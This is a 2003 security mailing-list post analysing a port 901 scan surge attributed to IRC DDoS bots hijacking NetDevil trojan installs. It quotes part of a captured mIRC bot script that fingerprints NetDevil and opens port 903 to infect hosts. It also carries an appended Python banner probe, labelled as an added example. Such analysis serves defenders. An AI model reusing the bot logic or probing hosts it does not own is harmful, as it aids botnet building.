[Dshield] new trojan - port 901 spike

Joe Stewart jstewart at lurhq.com
Thu Jun 5 13:03:57 GMT 2003


On Wednesday 04 June 2003 08:10 pm, Johannes B. Ullrich wrote:
> I just put up a quick draft of a writeup explaining
> the recent surge in port 901:
>
> http://isc.sans.org/diary.html?date=2003-06-04

The writeup is a little unclear... it sounds as if NetDevil has to be 
listening on port 901, and then the attacker uploads... NetDevil?

Could it be uploading some IRC DDoS bot instead? On the Intrusions
mailing list, John Sage reported capturing a file from a host that was
probing for SubSeven. In that file was a mIRC-based bot with the
capability to infect Net-Devil as well. So it looks like we have
several different DDoS botnets being built using SubSeven, Kuang2
and NetDevil, because they are easy targets for bottom-feeders.

The post where John reported the location of the downloaded file: 
http://cert.uni-stuttgart.de/archive/intrusions/2003/05/msg00240.html

Here is an excerpt of the mIRC script found in that file which checks for
NetDevil:
  ; Tail of the scanner's sockread handler (the start of the handler is not in
  ; the capture). %scan.info holds the line just read from the port 901 socket.
  if (ver1. isin %scan.info) {
    ; Banner contains "ver1." (isin is case-insensitive): report a NetDevil host,
    ; "version" is just the last three characters of the banner
    smsg $sc net-devil found $+ $lb $+ ! $+ $rb $+ . $sock($sockname).ip $sock($sockname).port version: $b($right(%scan.info,3))
    if ($right(%scan.info,1) == 5) {
      ; Banner ends in 5: open a new socket to port 903 and rename this one ndrun<ip>
      sockopen nd903[ $+ $r $+ ] $sock($sockname).ip 903
      sockrename $sockname ndrun $+ $sock($sockname).ip
      halt
    }
    ; Any other banner: same thing under a different socket name
    sockopen nd9032[ $+ $r $+ ] $sock($sockname).ip 903
    sockrename $sockname ndrun $+ $sock($sockname).ip
  }
  ; Password-protected NetDevil: give up on this host
  ; (sc is a bot alias not shown in the excerpt, presumably wrapping sockclose)
  if (%scan.info == pass_pleaz) { .sc $sockname }
  .timer 1 120 sc $sockname
}
on 1:sockread:ndrun*:{
  if ($sockerr > 0) { .sc $sockname | halt }
  var %ndrun | sockread -f %ndrun
  ; The port 903 side reports completion with "pleaz_run_done"
  if (%ndrun == pleaz_run_done) { smsg $sc done updating net-devil $sock($sockname).ip $sock($sockname).port }
  .timer 1 120 sockclose $sockname
}


-- 
Joe Stewart, GCIH 
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/
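The NetDevil fingerprint from the mIRC excerpt above, re-implemented in Python as an added example for this thread (it is not code from the post or from the captured bot). Only the decision rules visible in the excerpt are reproduced: a line read from port 901 containing "ver1." marks a NetDevil host and its last three characters are what the bot reports as the version, a last character of "5" selects the bot's "nd903" socket name rather than "nd9032", and a line equal to "pass_pleaz" means the listener wants a password. The function names, the result structure, the sample banners and the assumption that the listener speaks first on connect are all mine; the port 903 follow-up the bot performs is deliberately not reproduced.

```python
"""Re-implementation of the NetDevil banner check used by the captured mIRC bot.

Added example; not code from the mailing-list post or from the bot itself.
Decision rules taken from the mIRC excerpt:
  - a line from port 901 containing "ver1." (mIRC 'isin' is case-insensitive)
    marks a NetDevil host; the reported version is the line's last 3 characters;
  - if the last character is "5" the bot opens its port-903 socket as "nd903"
    and halts, otherwise as "nd9032";
  - a line equal to "pass_pleaz" (mIRC '==' is case-insensitive) means the
    listener wants a password.
Names, the result structure and the sample banners below are assumptions.
"""
import socket
from dataclasses import dataclass
from typing import Optional


@dataclass
class NetDevilResult:
    is_netdevil: bool            # banner matched the bot's "ver1." test
    version: Optional[str]       # $right(%scan.info,3) in the bot
    socket_tag: Optional[str]    # which port-903 socket name the bot would use
    password_prompt: bool        # banner was "pass_pleaz"


def classify_banner(banner: bytes) -> NetDevilResult:
    """Apply the bot's checks to one line received from a port 901 listener."""
    # mIRC sockread hands the script a line without its CR/LF, so strip those.
    text = banner.decode("latin-1").strip("\r\n")
    if "ver1." in text.lower():
        tag = "nd903" if text.endswith("5") else "nd9032"
        return NetDevilResult(True, text[-3:], tag, False)
    if text.lower() == "pass_pleaz":
        return NetDevilResult(False, None, None, True)
    return NetDevilResult(False, None, None, False)


def probe_host(host: str, port: int = 901, timeout: float = 5.0) -> NetDevilResult:
    """Connect, read whatever the listener sends first, classify it.

    Assumes, as the excerpt's read handler suggests, that the NetDevil listener
    speaks first; the part of the handler that would show this is not in the
    capture.  Only the port 901 check is done here; the bot's port 903 step
    is intentionally not reproduced.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
    return classify_banner(data)


# Constructed sample responses (not captured data) to exercise the rules.
SAMPLE_BANNERS = {
    "ver1 ending in 5":  b"ver1.45\r\n",
    "ver1 other":        b"ver1.30\r\n",
    "mixed case":        b"VER1.30\r\n",
    "password prompt":   b"pass_pleaz\r\n",
    "unrelated service": b"220 mail.example.test ESMTP\r\n",
}

if __name__ == "__main__":
    for label, banner in SAMPLE_BANNERS.items():
        print(f"{label:18} -> {classify_banner(banner)}")
```

Running the module classifies the constructed banners offline; probe_host() is the same check applied to a live socket, for confirming a suspected NetDevil listener on a host you are responsible for.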
